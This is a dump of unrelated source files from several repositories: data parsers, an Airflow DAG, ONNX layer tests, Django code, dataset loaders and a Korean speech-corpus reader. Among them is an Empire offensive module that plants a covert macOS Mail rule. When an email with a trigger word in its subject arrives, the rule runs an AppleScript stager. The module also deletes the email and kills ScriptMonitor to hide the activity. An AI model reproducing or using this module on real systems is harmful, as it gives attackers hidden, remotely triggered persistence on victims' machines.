DATA_FORMAT = 'NetworkMiner .fileinfos file'
COLUMNS = (
'source_ip', 'source_port', 'destination_ip', 'destination_port',
'filename', 'file_path', 'file_size', 'unused', 'file_md5', 'unused2',
'file_details', 'unused4', 'timestamp')
MIN_COLUMNS = 13
def ParseRow(self, parser_mediator, row_offset, row):
"""Parses a line of the log file and produces events.
Args:
parser_mediator (ParserMediator): mediates interactions between parsers
and other components, such as storage and dfvfs.
row_offset (int): line number of the row.
row (dict[str, str]): fields of a single row, as specified in COLUMNS.
"""
event_data = NetworkMinerEventData()
if row.get('timestamp', None) != 'Timestamp':
date_time = dfdatetime_time_elements.TimeElementsInMicroseconds()
for field in (
'source_ip', 'source_port', 'destination_ip',
'destination_port', 'filename', 'file_path', 'file_size', 'file_md5',
'file_details'):
setattr(event_data, field, row[field])
try:
timestamp = row.get('timestamp', None)
date_time.CopyFromStringISO8601(timestamp)
except ValueError:
parser_mediator.ProduceExtractionWarning('invalid date time value')
return
event = time_events.DateTimeValuesEvent(
date_time, definitions.TIME_DESCRIPTION_WRITTEN)
parser_mediator.ProduceEventWithEventData(event, event_data)
def VerifyRow(self, parser_mediator, row):
"""Verifies if a line of the file is in the expected format.
Args:
parser_mediator (ParserMediator): mediates interactions between parsers
and other components, such as storage and dfvfs.
row (dict[str, str]): fields of a single row, as specified in COLUMNS.
Returns:
bool: True if this is the correct parser, False otherwise.
"""
if len(row) != self.MIN_COLUMNS:
return False
# Check the date format
# If it doesn't parse, then this isn't a NetworkMiner .fileinfos file.
timestamp_value = row.get('timestamp', None)
if timestamp_value != 'Timestamp':
date_time = dfdatetime_time_elements.TimeElementsInMicroseconds()
try:
date_time.CopyFromStringISO8601(timestamp_value)
except ValueError:
return False
return True
manager.ParsersManager.RegisterParser(NetworkMinerParser)
|
chapter05/dags/02_branch_task.py | add54/Data_PipeLine_Apache_Airflow | 303 | 12750571 | import airflow
from airflow import DAG
from airflow.operators.dummy import DummyOperator
from airflow.operators.python import PythonOperator
ERP_CHANGE_DATE = airflow.utils.dates.days_ago(1)
def _fetch_sales(**context):
if context["execution_date"] < ERP_CHANGE_DATE:
_fetch_sales_old(**context)
else:
_fetch_sales_new(**context)
def _fetch_sales_old(**context):
print("Fetching sales data (OLD)...")
def _fetch_sales_new(**context):
print("Fetching sales data (NEW)...")
def _clean_sales(**context):
if context["execution_date"] < airflow.utils.dates.days_ago(1):
_clean_sales_old(**context)
else:
_clean_sales_new(**context)
def _clean_sales_old(**context):
print("Preprocessing sales data (OLD)...")
def _clean_sales_new(**context):
print("Preprocessing sales data (NEW)...")
with DAG(
dag_id="02_branch_function",
start_date=airflow.utils.dates.days_ago(3),
schedule_interval="@daily",
) as dag:
start = DummyOperator(task_id="start")
fetch_sales = PythonOperator(task_id="fetch_sales", python_callable=_fetch_sales)
clean_sales = PythonOperator(task_id="clean_sales", python_callable=_clean_sales)
fetch_weather = DummyOperator(task_id="fetch_weather")
clean_weather = DummyOperator(task_id="clean_weather")
join_datasets = DummyOperator(task_id="join_datasets")
train_model = DummyOperator(task_id="train_model")
deploy_model = DummyOperator(task_id="deploy_model")
start >> [fetch_sales, fetch_weather]
fetch_sales >> clean_sales
fetch_weather >> clean_weather
[clean_sales, clean_weather] >> join_datasets
join_datasets >> train_model >> deploy_model
|
tests/layer_tests/onnx_tests/test_squeeze.py | ryanloney/openvino-1 | 1,127 | 12750573 | <gh_stars>1000+
# Copyright (C) 2018-2022 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import pytest
from common.onnx_layer_test_class import Caffe2OnnxLayerTest
class TestSqueeze(Caffe2OnnxLayerTest):
def create_squeeze_net(self, axes, input_shape, output_shape, ir_version):
"""
ONNX net IR net
Input->Squeeze(axes=0)->Output => Input->Reshape
"""
#
# Create ONNX model
#
import onnx
from onnx import helper
from onnx import TensorProto
input = helper.make_tensor_value_info('input', TensorProto.FLOAT, input_shape)
output = helper.make_tensor_value_info('output', TensorProto.FLOAT, output_shape)
node_squeeze_def = onnx.helper.make_node(
'Squeeze',
inputs=['input'],
outputs=['output'],
axes=axes
)
# Create the graph (GraphProto)
graph_def = helper.make_graph(
[node_squeeze_def],
'test_squeeze_model',
[input],
[output],
)
# Create the model (ModelProto)
onnx_net = helper.make_model(graph_def, producer_name='test_squeeze_model')
#
# Create reference IR net
# Please, specify 'type': 'Input' for input node
# Moreover, do not forget to validate ALL layer attributes!!!
#
ref_net = None
return onnx_net, ref_net
def create_squeeze_net_const(self, axes, input_shape, output_shape, ir_version):
"""
ONNX net IR net
Input->Concat(+squeezed const)->Output => Input->Concat(+const)
"""
#
# Create ONNX model
#
import onnx
from onnx import helper
from onnx import TensorProto
import numpy as np
concat_axis = 0
concat_output_shape = output_shape.copy()
concat_output_shape[concat_axis] *= 2
input = helper.make_tensor_value_info('input', TensorProto.FLOAT, output_shape)
output = helper.make_tensor_value_info('output', TensorProto.FLOAT, concat_output_shape)
const_number = np.prod(input_shape)
constant = np.random.randint(-127, 127, const_number).astype(np.float)
constant = np.reshape(constant, input_shape)
node_const_def = onnx.helper.make_node(
'Constant',
inputs=[],
outputs=['const1'],
value=helper.make_tensor(
name='const_tensor',
data_type=TensorProto.FLOAT,
dims=constant.shape,
vals=constant.flatten(),
),
)
node_squeeze_def = onnx.helper.make_node(
'Squeeze',
inputs=['const1'],
outputs=['squeeze1'],
axes=axes
)
node_concat_def = onnx.helper.make_node(
'Concat',
inputs=['input', 'squeeze1'],
outputs=['output'],
axis=concat_axis
)
# Create the graph (GraphProto)
graph_def = helper.make_graph(
[node_const_def, node_squeeze_def, node_concat_def],
'test_squeeze_model',
[input],
[output],
)
# Create the model (ModelProto)
onnx_net = helper.make_model(graph_def, producer_name='test_squeeze_model')
#
# Create reference IR net
# Please, specify 'type': 'Input' for input node
# Moreover, do not forget to validate ALL layer attributes!!!
#
ref_net = None
return onnx_net, ref_net
test_data_5D = [
dict(axes=[0], input_shape=[1, 2, 3, 10, 10], output_shape=[2, 3, 10, 10]),
dict(axes=[1], input_shape=[2, 1, 3, 10, 10], output_shape=[2, 3, 10, 10]),
dict(axes=[2], input_shape=[2, 3, 1, 10, 10], output_shape=[2, 3, 10, 10]),
dict(axes=[3], input_shape=[2, 3, 10, 1, 10], output_shape=[2, 3, 10, 10]),
dict(axes=[4], input_shape=[2, 3, 10, 10, 1], output_shape=[2, 3, 10, 10]),
dict(axes=[0, 1], input_shape=[1, 1, 3, 10, 10], output_shape=[3, 10, 10]),
dict(axes=[0, 2], input_shape=[1, 3, 1, 10, 10], output_shape=[3, 10, 10]),
dict(axes=[0, 3], input_shape=[1, 3, 10, 1, 10], output_shape=[3, 10, 10]),
dict(axes=[0, 4], input_shape=[1, 3, 10, 10, 1], output_shape=[3, 10, 10]),
dict(axes=[1, 2], input_shape=[3, 1, 1, 10, 10], output_shape=[3, 10, 10]),
dict(axes=[1, 3], input_shape=[3, 1, 10, 1, 10], output_shape=[3, 10, 10]),
dict(axes=[1, 4], input_shape=[3, 1, 10, 10, 1], output_shape=[3, 10, 10]),
dict(axes=[2, 3], input_shape=[3, 10, 1, 1, 10], output_shape=[3, 10, 10]),
dict(axes=[2, 4], input_shape=[3, 10, 1, 10, 1], output_shape=[3, 10, 10]),
dict(axes=[3, 4], input_shape=[3, 10, 10, 1, 1], output_shape=[3, 10, 10]),
dict(axes=[0, 1, 2], input_shape=[1, 1, 1, 10, 10], output_shape=[10, 10]),
dict(axes=[0, 1, 3], input_shape=[1, 1, 10, 1, 10], output_shape=[10, 10]),
dict(axes=[0, 1, 4], input_shape=[1, 1, 10, 10, 1], output_shape=[10, 10]),
dict(axes=[0, 2, 3], input_shape=[1, 10, 1, 1, 10], output_shape=[10, 10]),
dict(axes=[0, 2, 4], input_shape=[1, 10, 1, 10, 1], output_shape=[10, 10]),
dict(axes=[0, 3, 4], input_shape=[1, 10, 10, 1, 1], output_shape=[10, 10]),
dict(axes=[1, 2, 3], input_shape=[10, 1, 1, 1, 10], output_shape=[10, 10]),
dict(axes=[1, 2, 4], input_shape=[10, 1, 1, 10, 1], output_shape=[10, 10]),
dict(axes=[1, 3, 4], input_shape=[10, 1, 10, 1, 1], output_shape=[10, 10]),
dict(axes=[2, 3, 4], input_shape=[10, 10, 1, 1, 1], output_shape=[10, 10])]
test_data_4D = [
dict(axes=[0], input_shape=[1, 3, 10, 10], output_shape=[3, 10, 10]),
dict(axes=[1], input_shape=[3, 1, 10, 10], output_shape=[3, 10, 10]),
dict(axes=[2], input_shape=[3, 10, 1, 10], output_shape=[3, 10, 10]),
dict(axes=[3], input_shape=[3, 10, 10, 1], output_shape=[3, 10, 10]),
dict(axes=[0, 1], input_shape=[1, 1, 10, 10], output_shape=[10, 10]),
dict(axes=[0, 2], input_shape=[1, 10, 1, 10], output_shape=[10, 10]),
dict(axes=[0, 3], input_shape=[1, 10, 10, 1], output_shape=[10, 10]),
dict(axes=[1, 2], input_shape=[10, 1, 1, 10], output_shape=[10, 10]),
dict(axes=[1, 3], input_shape=[10, 1, 10, 1], output_shape=[10, 10]),
dict(axes=[2, 3], input_shape=[10, 10, 1, 1], output_shape=[10, 10])]
test_data_3D = [
dict(axes=[0], input_shape=[1, 10, 10], output_shape=[10, 10]),
dict(axes=[1], input_shape=[10, 1, 10], output_shape=[10, 10]),
dict(axes=[2], input_shape=[10, 10, 1], output_shape=[10, 10])]
@pytest.mark.parametrize("params", test_data_5D)
@pytest.mark.nightly
def test_squeeze_5D(self, params, ie_device, precision, ir_version, temp_dir, api_2):
self._test(*self.create_squeeze_net(**params, ir_version=ir_version), ie_device, precision,
ir_version,
temp_dir=temp_dir, api_2=api_2)
@pytest.mark.parametrize("params", test_data_4D)
@pytest.mark.nightly
def test_squeeze_4D(self, params, ie_device, precision, ir_version, temp_dir, api_2):
self._test(*self.create_squeeze_net(**params, ir_version=ir_version), ie_device, precision,
ir_version,
temp_dir=temp_dir, api_2=api_2)
@pytest.mark.parametrize("params", test_data_3D)
@pytest.mark.nightly
def test_squeeze_3D(self, params, ie_device, precision, ir_version, temp_dir, api_2):
self._test(*self.create_squeeze_net(**params, ir_version=ir_version), ie_device, precision,
ir_version,
temp_dir=temp_dir, api_2=api_2)
@pytest.mark.parametrize("params", test_data_5D)
@pytest.mark.nightly
def test_squeeze_const_5D(self, params, ie_device, precision, ir_version, temp_dir, api_2):
self._test(*self.create_squeeze_net_const(**params, ir_version=ir_version), ie_device,
precision, ir_version,
temp_dir=temp_dir, api_2=api_2)
@pytest.mark.parametrize("params", test_data_4D)
@pytest.mark.nightly
def test_squeeze_const_4D(self, params, ie_device, precision, ir_version, temp_dir, api_2):
self._test(*self.create_squeeze_net_const(**params, ir_version=ir_version), ie_device,
precision, ir_version,
temp_dir=temp_dir, api_2=api_2)
@pytest.mark.parametrize("params", test_data_3D)
@pytest.mark.nightly
def test_squeeze_const_3D(self, params, ie_device, precision, ir_version, temp_dir, api_2):
self._test(*self.create_squeeze_net_const(**params, ir_version=ir_version), ie_device,
precision, ir_version,
temp_dir=temp_dir, api_2=api_2)
|
mayan/apps/views/fields.py | nattangwiwat/Mayan-EDMS-recitation | 343 | 12750594 | from django import forms
from django.core.exceptions import ImproperlyConfigured
from mayan.apps.acls.models import AccessControlList
class FilteredModelFieldMixin:
def __init__(self, *args, **kwargs):
self.source_model = kwargs.pop('source_model', None)
self.permission = kwargs.pop('permission', None)
self.source_queryset = kwargs.pop('source_queryset', None)
if self.source_queryset is None:
if self.source_model:
self.source_queryset = self.source_model._meta.default_manager.all()
else:
raise ImproperlyConfigured(
'{} requires a source_queryset or a source_model to be '
'specified as keyword argument.'.format(
self.__class__.__name__
)
)
kwargs['queryset'] = self.source_queryset.none()
super().__init__(*args, **kwargs)
def reload(self):
if self.permission and self.user:
self.queryset = AccessControlList.objects.restrict_queryset(
permission=self.permission, queryset=self.source_queryset,
user=self.user
)
else:
self.queryset = self.source_queryset
class FilteredModelChoiceField(
FilteredModelFieldMixin, forms.ModelChoiceField
):
"""Single selection filtered model choice field"""
class FilteredModelMultipleChoiceField(
FilteredModelFieldMixin, forms.ModelMultipleChoiceField
):
"""Multiple selection filtered model choice field"""
|
lib/modules/python/persistence/osx/mail.py | Gui-Luz/Empire | 5,720 | 12750630 | <gh_stars>1000+
from time import time
from random import choice
from string import ascii_uppercase
class Module:
def __init__(self, mainMenu, params=[]):
# metadata info about the module, not modified during runtime
self.info = {
# name for the module that will appear in module menus
'Name': 'Mail',
# list of one or more authors for the module
'Author': ['@n00py'],
# more verbose multi-line description of the module
'Description': ('Installs a mail rule that will execute an AppleScript stager when a trigger word is present in the Subject of an incoming mail.'),
# True if the module needs to run in the background
'Background' : False,
# File extension to save the file as
'OutputExtension' : None,
# if the module needs administrative privileges
'NeedsAdmin' : False,
# True if the method doesn't touch disk/is reasonably opsec safe
'OpsecSafe' : False,
# the module language
'Language': 'python',
# the minimum language version needed
'MinLanguageVersion': '2.6',
# list of any references/other comments
'Comments': ['https://github.com/n00py/MailPersist']
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
# The 'Agent' option is the only one that MUST be in a module
'Description' : 'Agent to execute module on.',
'Required' : True,
'Value' : ''
},
'Listener' : {
'Description' : 'Listener to use.',
'Required' : True,
'Value' : ''
},
'SafeChecks': {
'Description': 'Switch. Checks for LittleSnitch or a SandBox, exit the staging process if true. Defaults to True.',
'Required': True,
'Value': 'True'
},
'UserAgent' : {
'Description' : 'User-agent string to use for the staging request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'RuleName' : {
'Description' : 'Name of the Rule.',
'Required' : True,
'Value' : 'Spam Filter'
},
'Trigger' : {
'Description' : 'The trigger word.',
'Required' : True,
'Value' : ''
}
}
#
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
# During instantiation, any settable option parameters
# are passed as an object set to the module and the
# options dictionary is automatically set. This is mostly
# in case options are passed on the command line
if params:
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self, obfuscate=False, obfuscationCommand=""):
ruleName = self.options['RuleName']['Value']
trigger = self.options['Trigger']['Value']
listenerName = self.options['Listener']['Value']
userAgent = self.options['UserAgent']['Value']
safeChecks = self.options['SafeChecks']['Value']
launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='python', userAgent=userAgent, safeChecks=safeChecks)
launcher = launcher.replace('"', '\\"')
launcher = launcher.replace('"', '\\"')
launcher = "do shell script \"%s\"" % (launcher)
hex = '0123456789ABCDEF'
def UUID():
return ''.join([choice(hex) for x in range(8)]) + "-" + ''.join(
[choice(hex) for x in range(4)]) + "-" + ''.join([choice(hex) for x in range(4)]) + "-" + ''.join(
[choice(hex) for x in range(4)]) + "-" + ''.join([choice(hex) for x in range(12)])
CriterionUniqueId = UUID()
RuleId = UUID()
TimeStamp = str(int(time()))[0:9]
SyncedRules = "/tmp/" + ''.join(choice(ascii_uppercase) for i in range(12))
RulesActiveState = "/tmp/" + ''.join(choice(ascii_uppercase) for i in range(12))
AppleScript = ''.join(choice(ascii_uppercase) for i in range(12)) + ".scpt"
plist = '''<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<array>
<dict>
<key>AllCriteriaMustBeSatisfied</key>
<string>NO</string>
<key>AppleScript</key>
<string>''' + AppleScript + '''</string>
<key>AutoResponseType</key>
<integer>0</integer>
<key>Criteria</key>
<array>
<dict>
<key>CriterionUniqueId</key>
<string>''' + CriterionUniqueId + '''</string>
<key>Expression</key>
<string>''' + str(trigger) + '''</string>
<key>Header</key>
<string>Subject</string>
</dict>
</array>
<key>Deletes</key>
<string>YES</string>
<key>HighlightTextUsingColor</key>
<string>NO</string>
<key>MarkFlagged</key>
<string>NO</string>
<key>MarkRead</key>
<string>NO</string>
<key>NotifyUser</key>
<string>NO</string>
<key>RuleId</key>
<string>''' + RuleId + '''</string>
<key>RuleName</key>
<string>''' + str(ruleName) + '''</string>
<key>SendNotification</key>
<string>NO</string>
<key>ShouldCopyMessage</key>
<string>NO</string>
<key>ShouldTransferMessage</key>
<string>NO</string>
<key>TimeStamp</key>
<integer>''' + TimeStamp + '''</integer>
<key>Version</key>
<integer>1</integer>
</dict>
</array>
</plist>'''
plist2 = '''<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>''' + RuleId + '''</key>
<true/>
</dict>
</plist>
'''
script = """
import os
home = os.getenv("HOME")
AppleScript = '%s'
SyncedRules = '%s'
RulesActiveState = '%s'
plist = \"\"\"%s\"\"\"
plist2 = \"\"\"%s\"\"\"
payload = \'\'\'%s\'\'\'
payload = payload.replace('&\"', '& ')
payload += "kill `ps -ax | grep ScriptMonitor |grep -v grep | awk \'{print $1}\'`"
payload += '\"'
script = home + "/Library/Application Scripts/com.apple.mail/" + AppleScript
os.system("touch " + SyncedRules)
with open(SyncedRules, 'w+') as f:
f.write(plist)
f.close()
os.system("touch " + RulesActiveState)
with open(RulesActiveState, 'w+') as f:
f.write(plist2)
f.close()
with open(script, 'w+') as f:
f.write(payload)
f.close()
with open("/System/Library/CoreServices/SystemVersion.plist", 'r') as a:
v = a.read()
version = "V1"
if "10.7" in v:
version = "V2"
if "10.7" in v:
version = "V2"
if "10.8" in v:
version = "V2"
if "10.9" in v:
version = "V2"
if "10.10" in v:
version = "V2"
if "10.11" in v:
version = "V3"
if "10.12" in v:
version = "V4"
a.close()
if os.path.isfile(home + "/Library/Mobile Documents/com~apple~mail/Data/" + version + "/MailData/ubiquitous_SyncedRules.plist"):
print "Trying to write to Mobile"
os.system("/usr/libexec/PlistBuddy -c 'Merge " + SyncedRules + "' " + home + "/Library/Mobile\ Documents/com~apple~mail/Data/" + version + "/MailData/ubiquitous_SyncedRules.plist")
else:
os.system("/usr/libexec/PlistBuddy -c 'Merge " + SyncedRules + "' " + home + "/Library/Mail/" + version + "/MailData/SyncedRules.plist")
print "Writing to main rules"
os.system("/usr/libexec/PlistBuddy -c 'Merge " + RulesActiveState + "' "+ home + "/Library/Mail/" + version + "/MailData/RulesActiveState.plist")
os.system("rm " + SyncedRules)
os.system("rm " + RulesActiveState)
""" % (AppleScript, SyncedRules, RulesActiveState, plist, plist2, launcher)
return script |
orchestra/migrations/0055_auto_20160429_0823.py | code-review-doctor/orchestra | 444 | 12750642 | <reponame>code-review-doctor/orchestra
# -*- coding: utf-8 -*-
# Generated by Django 1.9.5 on 2016-04-29 08:23
from __future__ import unicode_literals
import django.db.models.deletion
from django.db import migrations
from django.db import models
class Migration(migrations.Migration):
dependencies = [
('orchestra', '0053_worker_slack_user_id'),
]
operations = [
migrations.RemoveField( # manually-reviewed
model_name='staffingrequest',
name='worker',
),
migrations.AddField(
model_name='staffingrequest',
name='communication_preference',
field=models.ForeignKey(
default=None, on_delete=django.db.models.deletion.CASCADE, to='orchestra.CommunicationPreference'),
),
migrations.AlterField(
model_name='communicationpreference',
name='communication_type',
field=models.IntegerField(
choices=[(0, 'task_status_change'), (1, 'new_task_available')]),
),
]
|
visual/dataset.py | eliasyin/MUStARD | 206 | 12750648 | import json
import os
from typing import Callable, Dict
import PIL.Image
import torch
import torch.utils.data
class SarcasmDataset(torch.utils.data.Dataset):
"""Dataset of Sarcasm videos."""
FRAMES_DIR_PATH = '../data/frames/utterances_final'
def __init__(self, transform: Callable = None, videos_data_path: str = '../data/sarcasm_data.json',
check_missing_videos: bool = True) -> None:
self.transform = transform
with open(videos_data_path) as file:
videos_data_dict = json.load(file)
for video_id in list(videos_data_dict.keys()): # Convert to list to possibly remove items.
video_folder_path = self._video_folder_path(video_id)
if not os.path.exists(video_folder_path):
if check_missing_videos:
raise FileNotFoundError(f"Directory {video_folder_path} not found, which was referenced in"
f" {videos_data_path}")
else:
del videos_data_dict[video_id]
self.video_ids = list(videos_data_dict.keys())
self.frame_count_by_video_id = {video_id: len(os.listdir(self._video_folder_path(video_id)))
for video_id in self.video_ids}
@staticmethod
def _video_folder_path(video_id: str) -> str:
return os.path.join(SarcasmDataset.FRAMES_DIR_PATH, video_id)
@staticmethod
def features_file_path(model_name: str, layer_name: str) -> str:
return f'../data/features/utterances_final/{model_name}_{layer_name}.hdf5'
def __getitem__(self, index) -> Dict[str, object]:
video_id = self.video_ids[index]
frames = None
video_folder_path = self._video_folder_path(video_id)
for i, frame_file_name in enumerate(os.listdir(video_folder_path)):
frame = PIL.Image.open(os.path.join(video_folder_path, frame_file_name))
if self.transform:
frame = self.transform(frame)
if frames is None:
# noinspection PyUnresolvedReferences
frames = torch.empty((self.frame_count_by_video_id[video_id], *frame.size()))
frames[i] = frame
return {'id': video_id, 'frames': frames}
def __len__(self) -> int:
return len(self.video_ids)
|
python/download_trained_model.py | linnostrom/DeepMVS | 301 | 12750656 | <filename>python/download_trained_model.py
import os
import sys
import subprocess
def download_trained_model(path = None):
if path is None:
path = os.path.join(os.path.dirname(os.path.abspath(__file__)), "..", "model")
if not os.path.isdir(path):
os.mkdir(path)
print "Downloading trained model..."
subprocess.call(
"cd {:} ;".format(path) +
"wget -O DeepMVS_final.model https://www.dropbox.com/s/dcaip7n3z0yk7lx/DeepMVS_final.model?dl=1 ;",
shell = True
)
print "Successfully downloaded trained model."
if __name__ == "__main__":
download_trained_model()
|
anaconda_project/internal/rename.py | kathatherine/anaconda-project | 188 | 12750659 | # -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# Copyright (c) 2016, Anaconda, Inc. All rights reserved.
#
# Licensed under the terms of the BSD 3-Clause License.
# The full license is in the file LICENSE.txt, distributed with this software.
# -----------------------------------------------------------------------------
from __future__ import absolute_import, print_function
import errno
import os
import uuid
def rename_over_existing(src, dest):
try:
# On Windows, this will throw EEXIST, on Linux it won't.
# on Win32 / Python 2.7 it throws OSError instead of IOError
os.rename(src, dest)
except (OSError, IOError) as e:
if e.errno == errno.EEXIST:
# Clearly this song-and-dance is not in fact atomic,
# but if something goes wrong putting the new file in
# place at least the backup file might still be
# around.
backup = dest + ".bak-" + str(uuid.uuid4())
os.rename(dest, backup)
try:
os.rename(src, dest)
except Exception as e:
os.rename(backup, dest)
raise e
finally:
try:
os.remove(backup)
except Exception:
pass
else:
raise e
|
aliyun-python-sdk-live/aliyunsdklive/__init__.py | leafcoder/aliyun-openapi-python-sdk | 1,001 | 12750703 | __version__ = '3.9.10' |
lib/python/treadmill/syscall/__init__.py | vrautela/treadmill | 133 | 12750714 | """Linux direct system call interface.
"""
|
examples/dataset_concatenation.py | bomber8013/h5py | 1,657 | 12750724 | <filename>examples/dataset_concatenation.py
'''Concatenate multiple files into a single virtual dataset
'''
import h5py
import numpy as np
import sys
import os
def concatenate(file_names_to_concatenate):
entry_key = 'data' # where the data is inside of the source files.
sh = h5py.File(file_names_to_concatenate[0], 'r')[entry_key].shape # get the first ones shape.
layout = h5py.VirtualLayout(shape=(len(file_names_to_concatenate),) + sh,
dtype=np.float64)
with h5py.File("VDS.h5", 'w', libver='latest') as f:
for i, filename in enumerate(file_names_to_concatenate):
vsource = h5py.VirtualSource(filename, entry_key, shape=sh)
layout[i, :, :, :] = vsource
f.create_virtual_dataset(entry_key, layout, fillvalue=0)
def create_random_file(folder, index):
"""create one random file"""
name = os.path.join(folder, 'myfile_' + str(index))
with h5py.File(name=name, mode='w') as f:
d = f.create_dataset('data', (5, 10, 20), 'i4')
data = np.random.randint(low=0, high=100, size=(5*10*20))
data = data.reshape(5, 10, 20)
d[:] = data
return name
def main(argv):
files = argv[1:]
if len(files) == 0:
import tempfile
tmp_dir = tempfile.mkdtemp()
for i_file in range(5):
files.append(create_random_file(tmp_dir, index=i_file))
concatenate(files)
if __name__ == '__main__':
main(sys.argv)
|
segmentation/model/decoder/__init__.py | RajasekharChowdary9/panoptic-deeplab | 506 | 12750727 | <reponame>RajasekharChowdary9/panoptic-deeplab<gh_stars>100-1000
from .aspp import ASPP
from .deeplabv3 import DeepLabV3Decoder
from .deeplabv3plus import DeepLabV3PlusDecoder
from .panoptic_deeplab import PanopticDeepLabDecoder
|
Python-3/basic_examples/python_breakpoint_examples.py | ghiloufibelgacem/jornaldev | 1,139 | 12750756 | <reponame>ghiloufibelgacem/jornaldev
x = 10
y = 'Hi'
z = 'Hello'
print(y)
# breakpoint() is introduced in Python 3.7
breakpoint()
print(z)
# Execution Steps
# Default:
# $python3.7 python_breakpoint_examples.py
# Disable Breakpoint:
# $PYTHONBREAKPOINT=0 python3.7 python_breakpoint_examples.py
# Using Other Debugger (for example web-pdb):
# $PYTHONBREAKPOINT=web_pdb.set_trace python3.7 python_breakpoint_examples.py
|
src/breakpad/src/tools/gyp/test/hello/gyptest-regyp.py | ant0ine/phantomjs | 263 | 12750766 | <gh_stars>100-1000
#!/usr/bin/env python
# Copyright (c) 2009 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Verifies that Makefiles get rebuilt when a source gyp file changes.
"""
import TestGyp
# Regenerating build files when a gyp file changes is currently only supported
# by the make generator.
test = TestGyp.TestGyp(formats=['make'])
test.run_gyp('hello.gyp')
test.build('hello.gyp', test.ALL)
test.run_built_executable('hello', stdout="Hello, world!\n")
# Sleep so that the changed gyp file will have a newer timestamp than the
# previously generated build files.
test.sleep()
test.write('hello.gyp', test.read('hello2.gyp'))
test.build('hello.gyp', test.ALL)
test.run_built_executable('hello', stdout="Hello, two!\n")
test.pass_test()
|
modules/nltk_contrib/hadoop/tf_idf/tfidf_map1.py | h4ck3rm1k3/NLP-project | 123 | 12750767 | from hadooplib.mapper import MapperBase
from hadooplib.inputformat import KeyValueInput
class TFIDFMapper1(MapperBase):
"""
keep only the word in the key field
remove filename from key and put it into value
(word filename, number) -> (word, filename number)
e.g. (dog 1.txt, 1) -> (dog, 1.txt 1)
"""
def __init__(self):
MapperBase.__init__(self)
self.set_inputformat(KeyValueInput)
def map(self, key, value):
"""
extract filename from key and put it into value
@param key: word and filename
@param value: term frequency
"""
word, filename = key.split()
self.outputcollector.collect(word, filename + "," + value)
if __name__ == "__main__":
TFIDFMapper1().call_map()
|
Korpora/korpus_aihub_kspon_speech.py | oikosohn/Korpora | 449 | 12750775 | <gh_stars>100-1000
import os
import re
from glob import glob
from dataclasses import dataclass
from typing import Dict
from .korpora import Korpus, KorpusData
from .utils import default_korpora_path
description = """ AI Hub 에서는 학습용 데이터를 제공합니다.
데이터를 활용하기 위해서는 아래 주소의 홈페이지에서 "AI데이터" 클릭 후,
이용하려는 데이터마다 직접 신청을 하셔야 합니다.
https://www.aihub.or.kr/
한국어 음성 데이터는 `AI 데이터` > `교육/문화/스포츠/` > `한국어음성` 혹은 아래의 주소에서
다운받으실 수 있으며, AI Hub에서는 1000시간 분량의 전체 음원데이터 뿐 아니라, 전사 스크립트(Text only)만을
따로 평문 텍스트(확장자: trn) 형식으로도 제공하고 있습니다.
https://www.aihub.or.kr/aidata/105 (2021.01.27 기준)
AI Hub 학습데이터는 신청 즉시 자동 승인됩니다.
Korpora>=0.3.0 에서는 로컬에 다운로드 된 말뭉치를 손쉽게 로딩하는 기능만 제공합니다.
이 스크립트는 전사스크립트 묶음 파일(KsponSpeech_scripts.zip)을 사용합니다. 이 파일을 압축 풀면
아래와 같은 파일들이 나옵니다.
train.trn
dev.trn
eval_clean.trn
eval_other.trn
위 파일들은 `~/Korpora/AIHub_KsponSpeech_scripts/` 혹은 `path/to/AIHub_KsponSpeech_scripts/` 에
저장되었다고 가정합니다.
(Korpora 개발진 <EMAIL>, <EMAIL>)"""
license = """ AI Hub 에서 제공하는 데이터의 소유권 및 전문은 다음의 주소에서 확인할 수 있습니다.
https://aihub.or.kr/form/iyongyaggwan
제16조 포털의 소유권
1. AI 허브가 제공하는 서비스, 그에 필요한 소프트웨어, 이미지, 마크, 로고, 디자인, 서비스명칭, 정보 및
상표 등과 관련된 지식재산권 및 기타 권리는 운영기관(및 AI허브 서비스 제공과 관련하여 운영기관과 계약을
체결한 기관)에 소유권이 있습니다.
2. 귀하는 AI 허브에서 명시적으로 승인한 경우를 제외하고는 전항의 소정의 각 재산에 대한 전부 또는 일부의 수정,
대여, 대출, 판매, 배포, 제작, 양도, 재라이센스, 담보권 설정 행위, 상업적 이용 행위를 할 수 없으며,
제3자로 하여금 이와 같은 행위를 하도록 허락할 수 없습니다"""
class AIHubKsponSpeechKorpus(Korpus):
def __init__(self, root_dir=None, force_download=False, prefix='', name='AIHub_KsponSpeech'):
super().__init__(description, license)
if root_dir is None:
root_dir = os.path.join(
default_korpora_path, 'AIHub_KsponSpeech_scripts', prefix)
elif isinstance(root_dir, str) and os.path.isdir(root_dir):
root_dir = os.path.join(
root_dir, 'AIHub_KsponSpeech_scripts', prefix)
paths = find_corpus_paths(root_dir)
self.train = KorpusData(
f'{name}.train', load_aihub_kspon_speech_scripts(paths))
@dataclass
class KsponSpeech:
sentence_id: str
sentence: str
pronounce_sentence: str
original_sentence: str
pronounces: Dict[str, str]
def __str__(self):
return self.__repr__()
def __repr__(self):
return f"""KsponSpeech(
id={self.sentence_id},
sentence={self.sentence},
pronounce_sentence={self.pronounce_sentence},
original_sentence={self.original_sentence},
pronounces={self.pronounces},
)"""
def find_corpus_paths(root_dir, suffix='.trn'):
def match(path):
return path[-4:] == suffix
# directory + wildcard
if isinstance(root_dir, str):
paths = sorted(glob(f'{root_dir}/*{suffix}') + glob(root_dir))
else:
paths = root_dir
paths = [path for path in paths if match(path)]
if not paths:
raise ValueError('Not found corpus files. Check `root_dir`')
return paths
